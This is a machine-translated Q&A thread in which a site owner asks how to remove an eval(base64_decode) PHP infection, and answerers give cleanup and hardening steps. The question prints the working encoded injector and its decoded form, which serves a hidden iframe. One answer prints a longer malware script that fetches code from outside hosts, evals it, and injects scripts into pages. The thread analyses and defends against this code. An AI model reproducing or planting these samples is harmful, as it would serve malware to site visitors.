php - 如何摆脱 eval-base64_decode 之类的 PHP 病毒文件？

Question

我的网站（非常大的社区网站）最近感染了病毒。每个index.php文件都已更改，因此这些文件的开始 php 标记已更改为以下行：

<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyAnPGRpdiBzdHlsZT0icG9zaXRpb246IGFic29sdXRlOyBsZWZ0OiAtMTk5OXB4OyB0b3A6IC0yOTk5cHg7Ij48aWZyYW1lIHNyYz0iaHR0cDovL2x6cXFhcmtsLmNvLmNjL1FRa0ZCd1FHRFFNR0J3WUFFa2NKQlFjRUFBY0RBQU1CQnc9PSIgd2lkdGg9IjIiIGhlaWdodD0iMiI+PC9pZnJhbWU+PC9kaXY+JzsNCn0='));

当我对此进行解码时，它产生了以下 PHP 代码：

    <?php
error_reporting(0);
$bot = FALSE ;
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');
$stop_ips_masks = array(
    array("216.239.32.0","216.239.63.255"),
    array("64.68.80.0"  ,"64.68.87.255"  ),
    array("66.102.0.0",  "66.102.15.255"),
    array("64.233.160.0","64.233.191.255"),
    array("66.249.64.0", "66.249.95.255"),
    array("72.14.192.0", "72.14.255.255"),
    array("209.85.128.0","209.85.255.255"),
    array("198.108.100.192","198.108.100.207"),
    array("173.194.0.0","173.194.255.255"),
    array("216.33.229.144","216.33.229.151"),
    array("216.33.229.160","216.33.229.167"),
    array("209.185.108.128","209.185.108.255"),
    array("216.109.75.80","216.109.75.95"),
    array("64.68.88.0","64.68.95.255"),
    array("64.68.64.64","64.68.64.127"),
    array("64.41.221.192","64.41.221.207"),
    array("74.125.0.0","74.125.255.255"),
    array("65.52.0.0","65.55.255.255"),
    array("74.6.0.0","74.6.255.255"),
    array("67.195.0.0","67.195.255.255"),
    array("72.30.0.0","72.30.255.255"),
    array("38.0.0.0","38.255.255.255")
    );
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
foreach ( $stop_ips_masks as $IPs ) {
    $first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
    if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}
foreach ($user_agent_to_filter as $bot_sign){
    if  (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
}
if (!$bot) {
echo '<div style="position: absolute; left: -1999px; top: -2999px;"><iframe src="http://lzqqarkl.co.cc/QQkFBwQGDQMGBwYAEkcJBQcEAAcDAAMBBw==" width="2" height="2"></iframe></div>';
}

我已经尝试了几种方法来清除病毒，甚至从备份中恢复，并且文件在几分钟或几小时后被重新感染。那么你能帮帮我吗？

你对这种病毒了解多少？

是否存在用于安装和传播的已知安全漏洞？

上面的 php 代码实际上做了什么？

它嵌入到 iframe 中的页面有什么作用？

当然更重要的是：我能做些什么来摆脱它？

请帮忙，我们几乎没有想法和希望:(

UPDATE1 更多细节：奇怪的是：当我们第一次检查受感染的文件时。它们已更改，但在某些情况下，它们在 ftp 程序中的修改时间显示上次访问是几天、几个月甚至几年前！这怎么可能？它让我疯狂！

更新 2 我认为问题是在用户在他的 Wordpress 安装中安装插件后引发的。从备份恢复并完全删除 Wordpress 文件夹和关联的数据库后，问题似乎消失了。我们目前订阅了一项安全服务，他们正在调查这个问题，以确保黑客永远消失。感谢任何回复的人。

Answer 1

恢复和清除站点的步骤（前提是您有已知的良好备份）。

1) 关闭网站

在进行补救工作之前，您基本上需要关闭网站的大门。这将防止访问者获得恶意代码、看到错误消息等。这只是一种好的做法。

您应该能够通过将以下内容放入webroot 中的.htaccess文件来执行此操作。（将“!!Your IP Address Here!!”替换为您自己的 IP 地址 -如果您不知道自己的 IP 地址，请参阅http://icanhazip.com 。）

order deny,allow
deny from all
allow from !!Your IP Address Here!!

2) 从服务器下载所有文件的副本

从您的良好备份中将所有内容下载到单独的文件夹中。这可能需要一段时间（取决于您的站点大小、连接速度等）。

3) 下载并安装文件/文件夹比较实用程序

在 Windows 机器上，您可以使用 WinMerge - http://winmerge.org/ - 它是免费的并且非常强大。在 MacOS 机器上，查看 Alternative.to 中可能的替代品列表

4) 运行文件/文件夹比较实用程序

您最终应该得到一些不同的结果：

• 文件相同 - 当前文件与您的备份相同，因此不受影响。
• 仅在左侧/右侧的文件 - 该文件要么仅存在于备份中（并且可能已从服务器中删除），要么仅存在于服务器上（并且可能已被黑客注入/创建）。
• 文件不同 - 服务器上的文件与备份中的文件不同，因此它可能已被您（为服务器配置）或黑客（注入代码）修改。

5) 解决分歧

（又名“为什么我们不能相处融洽？”）

对于相同的文件，不需要进一步的操作。对于仅在一侧存在的文件，请查看文件并确定它们是否合法（即用户上传的内容，您可能添加的其他文件等）对于不同的文件，请查看文件（文件差异实用程序甚至可以显示已添加/修改/删除的行）并查看服务器版本是否有效。覆盖（使用备份版本）任何包含恶意代码的文件。

6) 查看您的安全预防措施

这是否像更改您的 FTP/cPanel 密码一样简单，或者检查您对外部/不受控制的资源的使用（正如您提到的，您正在执行很多 fgets、fopens 等，您可能需要检查传递给它们的参数）是一种使脚本引入恶意代码的方法）等。

7) 检查现场工程

借此机会成为唯一查看该站点的人，以确保在更正受感染的文件并删除恶意文件后一切仍按预期运行。

8) 打开门

反转在步骤 1 中对.htaccess文件所做的更改。仔细观察。密切关注您的访问者和错误日志，以查看是否有人试图触发已删除的恶意文件等。

9）考虑自动检测方法

有一些解决方案允许您在主机上执行自动检查（使用 CRON 作业），这将检测并详细说明发生的任何更改。有些有点冗长（您会收到每个更改的文件的电子邮件），但您应该能够根据您的需要调整它们：

• Tripwire - 一个 PHP 脚本，用于检测和报告新的、删除的或修改的文件
• 用于监视文件更改的 Shell 脚本
• 如何检测您的网络服务器是否被黑客入侵并收到警报

10）有计划的备份，并保留一个好的括号

确保您已在您的网站上执行计划备份，保留其中一些备份，以便您有不同的步骤可以在必要时及时返回。例如，如果您执行每周备份，您可能希望保留以下内容：

• 4 x 每周备份
• 4 x 每月备份（您保留一个每周备份，可能是每月的第一周，作为每月备份）

如果有人用比代码注入攻击更具破坏性的东西攻击您的网站，这些总是会让生活变得更轻松。

哦，确保你也备份你的数据库——很多网站都是基于 CMS 的，拥有文件很好，但如果你丢失/损坏它们背后的数据库，那么备份基本上是无用的。

Answer 2

我遭受了同样的黑客工作。我也能够解密代码，虽然我得到了不同的 php 代码，但我首先通过遍历站点中的每个 php 文件并删除 eval 调用来删除注入的 php 文本。我仍在调查我是如何开始使用它的，但这是我从这个网站解密后的样子：

要解码每个 php 文件上的加密 php 脚本，请使用： http ://www.opinionatedgeek.com/dotnet/tools/base64decode/

并使用这个人格式化结果：http: //beta.phpformatter.com/

要清理，您需要从每个 php 文件顶部删除“eval”行，并从网站的基本文件夹中删除 .log 文件夹。

我找到了一个 python 脚本，我对其稍作修改以删除 php 文件中的特洛伊木马，因此我将其发布在这里供其他人使用：来自线程的代码源：在目录树中的所有文件中用另一个字符的所有实例替换一个字符

import os
import re
import sys

def try_to_replace(fname):
    if replace_extensions: 
        return fname.lower().endswith(".php")
    return True


def file_replace(fname, pat, s_after):
    # first, see if the pattern is even in the file.
    with open(fname) as f:
        if not any(re.search(pat, line) for line in f):
            return # pattern does not occur in file so we are done.

    # pattern is in the file, so perform replace operation.
    with open(fname) as f:
        out_fname = fname + ".tmp"
        out = open(out_fname, "w")
        for line in f:
            out.write(re.sub(pat, s_after, line))
        out.close()
        os.rename(out_fname, fname)


def mass_replace(dir_name, s_before, s_after):
    pat = re.compile(s_before)
    for dirpath, dirnames, filenames in os.walk(dir_name):
        for fname in filenames:
            if try_to_replace(fname):
                print "cleaning: " + fname
                fullname = os.path.join(dirpath, fname)
                file_replace(fullname, pat, s_after)

if len(sys.argv) != 2:
    u = "Usage: rescue.py <dir_name>\n"
    sys.stderr.write(u)
    sys.exit(1)

mass_replace(sys.argv[1], "eval\(base64_decode\([^.]*\)\);", "")

使用类型

python rescue.py 根文件夹

这就是恶意脚本试图做的事情：

<?php

if (function_exists('ob_start') && !isset($_SERVER['mr_no'])) {
    $_SERVER['mr_no'] = 1;
    if (!function_exists('mrobh')) {
        function get_tds_777($url)
        {
            $content = "";
            $content = @trycurl_777($url);
            if ($content !== false)
                return $content;

            $content = @tryfile_777($url);
            if ($content !== false)
                return $content;
            $content = @tryfopen_777($url);
            if ($content !== false)
                return $content;
            $content = @tryfsockopen_777($url);
            if ($content !== false)
                return $content;
            $content = @trysocket_777($url);
            if ($content !== false)
                return $content;
            return '';
        }

        function trycurl_777($url)
        {
            if (function_exists('curl_init') === false)
                return false;
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            $result = curl_exec($ch);
            curl_close($ch);
            if ($result == "")
                return false;
            return $result;
        }
        function tryfile_777($url)
        {
            if (function_exists('file') === false)
                return false;
            $inc = @file($url);
            $buf = @implode('', $inc);
            if ($buf == "")
                return false;
            return $buf;
        }
        function tryfopen_777($url)
        {
            if (function_exists('fopen') === false)
                return false;
            $buf = '';
            $f   = @fopen($url, 'r');
            if ($f) {
                while (!feof($f)) {
                    $buf .= fread($f, 10000);
                }
                fclose($f);
            } else
                return false;
            if ($buf == "")
                return false;
            return $buf;
        }
        function tryfsockopen_777($url)
        {
            if (function_exists('fsockopen') === false)
                return false;
            $p    = @parse_url($url);
            $host = $p['host'];
            $uri  = $p['path'] . '?' . $p['query'];
            $f    = @fsockopen($host, 80, $errno, $errstr, 30);
            if (!$f)
                return false;
            $request = "GET $uri HTTP/1.0\n";
            $request .= "Host: $host\n\n";
            fwrite($f, $request);
            $buf = '';
            while (!feof($f)) {
                $buf .= fread($f, 10000);
            }
            fclose($f);
            if ($buf == "")
                return false;
            list($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10), $buf);
            return $buf;
        }
        function trysocket_777($url)
        {
            if (function_exists('socket_create') === false)
                return false;
            $p    = @parse_url($url);
            $host = $p['host'];
            $uri  = $p['path'] . '?' . $p['query'];
            $ip1  = @gethostbyname($host);
            $ip2  = @long2ip(@ip2long($ip1));
            if ($ip1 != $ip2)
                return false;
            $sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
            if (!@socket_connect($sock, $ip1, 80)) {
                @socket_close($sock);
                return false;
            }
            $request = "GET $uri HTTP/1.0\n";
            $request .= "Host: $host\n\n";
            socket_write($sock, $request);
            $buf = '';
            while ($t = socket_read($sock, 10000)) {
                $buf .= $t;
            }
            @socket_close($sock);
            if ($buf == "")
                return false;
            list($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10), $buf);
            return $buf;
        }
        function update_tds_file_777($tdsfile)
        {
            $actual1 = $_SERVER['s_a1'];
            $actual2 = $_SERVER['s_a2'];
            $val     = get_tds_777($actual1);
            if ($val == "")
                $val = get_tds_777($actual2);
            $f = @fopen($tdsfile, "w");
            if ($f) {
                @fwrite($f, $val);
                @fclose($f);
            }
            if (strstr($val, "|||CODE|||")) {
                list($val, $code) = explode("|||CODE|||", $val);
                eval(base64_decode($code));
            }
            return $val;
        }
        function get_actual_tds_777()
        {
            $defaultdomain = $_SERVER['s_d1'];
            $dir           = $_SERVER['s_p1'];
            $tdsfile       = $dir . "log1.txt";
            if (@file_exists($tdsfile)) {
                $mtime = @filemtime($tdsfile);
                $ctime = time() - $mtime;
                if ($ctime > $_SERVER['s_t1']) {
                    $content = update_tds_file_777($tdsfile);
                } else {
                    $content = @file_get_contents($tdsfile);
                }
            } else {
                $content = update_tds_file_777($tdsfile);
            }
            $tds = @explode("\n", $content);
            $c   = @count($tds) + 0;
            $url = $defaultdomain;
            if ($c > 1) {
                $url = trim($tds[mt_rand(0, $c - 2)]);
            }
            return $url;
        }
        function is_mac_777($ua)
        {
            $mac = 0;
            if (stristr($ua, "mac") || stristr($ua, "safari"))
                if ((!stristr($ua, "windows")) && (!stristr($ua, "iphone")))
                    $mac = 1;
            return $mac;
        }
        function is_msie_777($ua)
        {
            $msie = 0;
            if (stristr($ua, "MSIE 6") || stristr($ua, "MSIE 7") || stristr($ua, "MSIE 8") || stristr($ua, "MSIE 9"))
                $msie = 1;
            return $msie;
        }
        function setup_globals_777()
        {
            $rz = $_SERVER["DOCUMENT_ROOT"] . "/.logs/";
            $mz = "/tmp/";
            if (!@is_dir($rz)) {
                @mkdir($rz);
                if (@is_dir($rz)) {
                    $mz = $rz;
                } else {
                    $rz = $_SERVER["SCRIPT_FILENAME"] . "/.logs/";
                    if (!@is_dir($rz)) {
                        @mkdir($rz);
                        if (@is_dir($rz)) {
                            $mz = $rz;
                        }
                    } else {
                        $mz = $rz;
                    }
                }
            } else {
                $mz = $rz;
            }
            $bot = 0;
            $ua  = $_SERVER['HTTP_USER_AGENT'];
            if (stristr($ua, "msnbot") || stristr($ua, "Yahoo"))
                $bot = 1;
            if (stristr($ua, "bingbot") || stristr($ua, "google"))
                $bot = 1;
            $msie = 0;
            if (is_msie_777($ua))
                $msie = 1;
            $mac = 0;
            if (is_mac_777($ua))
                $mac = 1;
            if (($msie == 0) && ($mac == 0))
                $bot = 1;
            global $_SERVER;
            $_SERVER['s_p1']     = $mz;
            $_SERVER['s_b1']     = $bot;
            $_SERVER['s_t1']     = 1200;
            $_SERVER['s_d1']     = base64_decode('http://ens122zzzddazz.com/');
            $d                   = '?d=' . urlencode($_SERVER["HTTP_HOST"]) . "&p=" . urlencode($_SERVER["PHP_SELF"]) . "&a=" . urlencode($_SERVER["HTTP_USER_AGENT"]);
            $_SERVER['s_a1']     = base64_decode('http://cooperjsutf8.ru/g_load.php') . $d;
            $_SERVER['s_a2']     = base64_decode('http://nlinthewood.com/g_load.php') . $d;
            $_SERVER['s_script'] = "nl.php?p=d";
        }
        setup_globals_777();
        if (!function_exists('gml_777')) {
            function gml_777()
            {
                $r_string_777 = '';
                if ($_SERVER['s_b1'] == 0)
                    $r_string_777 = '<script src="' . get_actual_tds_777() . $_SERVER['s_script'] . '"></script>';
                return $r_string_777;
            }
        }
        if (!function_exists('gzdecodeit')) {
            function gzdecodeit($decode)
            {
                $t     = @ord(@substr($decode, 3, 1));
                $start = 10;
                $v     = 0;
                if ($t & 4) {
                    $str = @unpack('v', substr($decode, 10, 2));
                    $str = $str[1];
                    $start += 2 + $str;
                }
                if ($t & 8) {
                    $start = @strpos($decode, chr(0), $start) + 1;
                }
                if ($t & 16) {
                    $start = @strpos($decode, chr(0), $start) + 1;
                }
                if ($t & 2) {
                    $start += 2;
                }
                $ret = @gzinflate(@substr($decode, $start));
                if ($ret === FALSE) {
                    $ret = $decode;
                }
                return $ret;
            }
        }
        function mrobh($content)
        {
            @Header('Content-Encoding: none');
            $decoded_content = gzdecodeit($content);
            if (preg_match('/\<\/body/si', $decoded_content)) {
                return preg_replace('/(\<\/body[^\>]*\>)/si', gml_777() . "\n" . '$1', $decoded_content);
            } else {
                return $decoded_content . gml_777();
            }
        }
        ob_start('mrobh');
    }
}

?> 

Answer 3

首先，关闭你的网站，直到你弄清楚他是如何进入的以及如何修复它。看起来它正在向您的客户提供恶意软件。

接下来，在您的 php 文件中搜索 fgets、fopen、fputs、eval 或 system。我推荐 notepad++，因为它具有“在文件中查找”功能。另外，请确保这是您的 PHP 被修改的唯一地方。你有离线副本可以比较吗？

Answer 4

要摆脱这些恶意 PHP，您只需将它们删除即可。如果文件被感染，您只需删除看起来可疑的部分。

找到这些文件总是很棘手，因为通常在您的 Web 根目录中有多个文件。

通常，如果您看到某种混淆，这对您来说是红色警报。

大多数恶意软件很容易根据它们使用的常用功能找到，这包括：

• base64_decode,
• lzw_decompress,
• eval,
• 等等

通过使用编码格式，它们压缩了它们的大小，使没有经验的用户更难以解码。

以下是一些grep可以找到最常见恶意软件 PHP 代码的命令：

grep -R return.*base64_decode  .
grep --include=\*.php -rn 'return.*base64_decode($v.\{6\})' .

您可以在服务器上运行这些命令，或者在将您的网站同步到本地计算机后（例如通过 FTP ncftpget -R）运行这些命令。

或者使用专门为查找此类恶意文件而设计的扫描工具，请参阅：PHP 安全扫描程序。

出于教育目的，请在kenorb/php-exploit-scripts GitHub（受@Mattias original collection的影响）上调查可用的被黑服务器时找到以下 PHP 漏洞利用脚本集合。这将使您了解这些 PHP 可疑文件的外观，因此您可以了解如何在您的服务器上找到更多这些文件。

也可以看看：

• 这个恶意 PHP 脚本有什么作用？
• Drupal：被黑客入侵后如何从管理页面中删除恶意脚本？

Answer 5

我的网站/或我托管的网站多次遭受类似攻击。

我介绍了我为解决问题所做的工作。我不会假装这是最好/最简单的方法，但它确实有效，从那时起我就可以主动将球保持在我的场上。

1. 尽快解决问题我创建了一个非常简单的 PHP 脚本（它是在熨斗很热的时候编写的，所以它可能不是最优化的代码，但它可以很快解决问题）： http: //www.ecommy.com/web-security /clean-php-files-from-eval-infection

2. 确保你知道这样的事情何时再次发生。黑客使用 SQL 注入您安装的一个外部模块的各种方法，通过字典攻击或众所周知的密码模式（如 1qaz...qwerty...等）暴力破解您的管理面板...在这里： http: //www.ecommy.com/web-security/scan-for-malware-viruses-and-php-eval-based-infections

3. cron 条目将类似于：0 2 * * 5 /root/scripts/base64eval_scan > /dev/null 2>&1&

我更新了页面，以便有人可以直接下载文件。希望它对你有用，因为它对我有用:)

Answer 6

1. 确保更新任何流行的 Web 应用程序，例如 Wordpress 或 vBulletin。旧版本存在许多漏洞，可能导致您的服务器受到威胁，如果不更新它们可能会再次发生。在这完成之前没有任何用处。

2. 如果文件不断被替换，则说明有 rootkit 或特洛伊木马在后台运行。该文件无法自我复制。您必须首先摆脱 rootkit。试试rkhunter、chkrootkit和LMD。比较安全服务器的输出并ps aux检查可疑文件。您可能需要重新安装操作系统。/var/tmp/tmp

3. 确保管理服务器的所有工作站都是最新且干净的。不要通过不安全的无线连接进行连接，也不要使用 FTP 等纯文本身份验证（改用 SFTP）。仅使用 https 登录控制面板。

4. 为了防止这种情况再次发生，请运行csf或类似的防火墙、每日LMD扫描，并为服务器上的所有应用程序保持最新的安全补丁。

Answer 7

我有同样的问题，当我删除它时，代码会自动生成。我做了这些步骤，它工作正常：

1-限制 SSH 访问

我看到一些 ssh 登录尝试，并猜测它可能与此恶意软件有关！

2- 启用 SELinux

记住为 nignx 权限访问文件配置 SElinux

3- 删除 eval(base64_decode(...))

从所有 index.php [从根文件夹、插件文件夹和 ....] 中删除包含 eval(base64_decode(...)) 的行

Answer 8

假设这是一个基于 Linux 的服务器并且您具有 SSH 访问权限，您可以运行它来删除有问题的代码：

find . -name "*.php" | xargs sed -i 's@eval[ \t]*([ \t]*base64_decode[ \t]*([ \t]*['"'"'"][A-Za-z0-9/_=+:!.-]\{1,\}['"'"'"][ \t]*)[ \t]*)[ \t]*;@@'

这涵盖了所有已知的 base64 实现，并且无论 base64 文本是用单引号还是双引号括起来都可以使用

编辑：现在也可以使用内部空格